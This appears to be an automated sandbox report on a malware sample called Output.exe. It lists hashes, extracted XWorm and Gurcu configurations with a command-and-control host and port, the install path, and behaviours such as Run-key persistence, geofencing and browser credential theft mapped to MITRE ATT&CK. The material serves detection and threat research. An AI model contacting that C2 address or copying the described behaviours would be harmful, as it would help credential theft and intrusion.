General
Target: Output.exe
Size: 11.6MB
Sample: 240930-nl7xksxckh
MD5: d7c99b9559332b8652b2cf85c34f1dea
SHA1: cbd247890c862d964683f8dc81cc3d7747bdfb73
SHA256: 53d398e45aaad1c1cbbb4be5abd2a0d2c039b746792fb63bd8b9b28aebf359ca
SHA512: 184945ec88ebe3e3ec5e3a71b9870b3459a0bb37491a665f356d3cb7286e0e79bed44a19e21cceba0fe0ec07a1d89e2238c70b06bd9c5dc5956b7715e8a8911f
SSDEEP: 196608:tO3ytpGu2gWR5fMEseOI8LG8Ac+g6sFZstcVw8q1Q6HmVF:tO3j5gWR5fBSI58t+gbZst9
Static task: static1
Behavioral task: behavioral1
Sample: Output.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: Output.exe
Resource: win10v2004-20240802-en
Malware Config
Extracted: xworm
reason-warnings.gl.at.ply.gg:20382
Install_directory: %AppData%
install_file: USB.exe
Extracted: gurcu
Targets
Target: Output.exe
Detect Xworm Payload

Checks computer location settings
Looks up country code configured in the registry, likely geofence.

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)